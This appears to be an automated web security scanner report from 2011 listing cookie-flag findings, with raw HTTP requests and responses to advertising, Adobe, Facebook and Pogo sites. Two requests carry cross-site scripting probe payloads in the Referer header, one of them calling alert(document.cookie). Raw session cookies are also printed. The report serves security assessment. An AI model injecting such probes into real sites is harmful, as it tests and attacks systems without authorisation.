HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.906164.758630.0XMC Set-Cookie: C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; F1=BA5Dp0EBAAAABAAAAEAAgEA; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ROLL=v5Q2V0cRVUyqcZK!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.955433.777340.0XMC Set-Cookie: C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: 17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=BA/Ep0EBAAAABAAAAIAAaEA; BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; C2=4PRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0K; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.949895.777340.0XMC Set-Cookie: C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: 49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/marketplace/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/membership/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/membership/logout.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/partnerportal/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/showcase/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/store/html/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/support/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c;path=/ Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html x ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=A2E-W; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:42 GMT Content-Length: 29866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/impression.php?campaign_id=137675572948107&partner_id=pandora.com&placement=like_button&extra_1=http%3A%2F%2Fwww.pandora.com%2F%3Fext_reg%3D1&extra_2=US HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; expires=Tue, 08-Feb-2011 01:23:22 GMT; path=/; domain=.facebook.com; httponly X-Cnection: close Date: Sun, 09 Jan 2011 01:23:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 08-Feb-2011 01:43:45 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:45 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event.php?eid=139663112758241 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=1_yt8; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:20:48 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=USH4D; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:19 GMT Content-Length: 27574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/instantpersonalization/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
